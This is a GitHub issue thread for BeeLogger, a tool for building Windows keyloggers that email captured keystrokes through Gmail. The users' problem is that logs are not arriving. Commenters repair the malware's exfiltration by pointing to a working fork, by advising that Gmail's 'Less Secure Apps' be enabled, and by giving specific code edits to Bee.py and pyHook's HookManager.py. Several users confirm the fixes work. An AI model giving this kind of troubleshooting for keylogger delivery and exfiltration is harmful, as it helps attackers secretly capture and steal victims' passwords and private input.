4w4k3 / BeeLogger

Generate Gmail Emailing Keyloggers to Windows.
BSD 3-Clause "New" or "Revised" License
1k stars 326 forks source link

Beelogger is not sending logs. #76

Open miguelm9 opened 6 years ago

miguelm9 commented 6 years ago

So, I downloaded the version that should work of BeeLogger, but I still don't get the logs. I read that people had the same issue but the managed to fixed through another version. Can anyone please help me? Thanks.

quantumcore commented 6 years ago

Delete BeeLogger and clone from this Link https://github.com/jinwei908/BeeLogger

miguelm9 commented 6 years ago

@fastisbac I already did. Still does not work.

quantumcore commented 6 years ago

It's working for me. Try enabling Less Secure Apps in Gmail Settings.

miguelm9 commented 6 years ago

@fastisbac It is ON already.

dimskiOf commented 5 years ago

@nerviosus there are 2 ways to solve the problem:

  1. You need to replace the python code in the Bee.py file in the template folder, in the folder beelogger there is a template folder and look for the code (ironm = win32event.CreateMutex) in Bee.py file delete the code after that

still in the same file, find the code (global data, lastWindow) delete the code (lastWindow) so that it becomes (global data) add the code after the code (window = event.WindowName)

lastWindow = "" (using quotation) globals () [lastWindow] = 1000

add the code

  1. find the file in .wine named (HookManager.py) in the folder "C: \ Python27 \ Lib \ site-packages \ pyHook" open the file and look for the code (event = KeyboardEvent) change the code "func = self.keyboard_funcs.get (msg)" to

"func = self.keyboard_funcs.get (int (str (msg)))" (without quotes)

if you are still confused contact my email "linux.swapp@gmail.com" I will give you a file that has been repaired

SOocoOT commented 5 years ago

Delete BeeLogger and clone from this Link https://github.com/jinwei908/BeeLogger

Worked for me.

but in received logs Unicode character are represented by ? mark !!!

how to fix this ??

erickpiloto commented 5 years ago

@nerviosus there are 2 ways to solve the problem:

1. You need to replace the python code in the Bee.py file in the template folder, in the folder beelogger there is a template folder and look for the code (ironm = win32event.CreateMutex) in Bee.py file delete the code after that

still in the same file, find the code (global data, lastWindow) delete the code (lastWindow) so that it becomes (global data) add the code after the code (window = event.WindowName)

lastWindow = "" (using quotation) globals () [lastWindow] = 1000

add the code

1. find the file in .wine named (HookManager.py) in the folder "C: \ Python27 \ Lib \ site-packages \ pyHook" open the file and look for the code (event = KeyboardEvent)
   change the code "func = self.keyboard_funcs.get (msg)" to

"func = self.keyboard_funcs.get (int (str (msg)))" (without quotes)

if you are still confused contact my email "linux.swapp@gmail.com" I will give you a file that has been repaired

I'm with same problem of not sending logs. I'll try this 1st way to fix it. I come back to tell if works. But i'm almost writing a new script inspired in Beelogger.

[EDIT] Fixed with 1st way above. Works great now!

truesamurai commented 4 years ago

Delete BeeLogger and clone from this Link https://github.com/jinwei908/BeeLogger

This version does not send me logging, but the clone you suggest here is working perfectly. Thanks.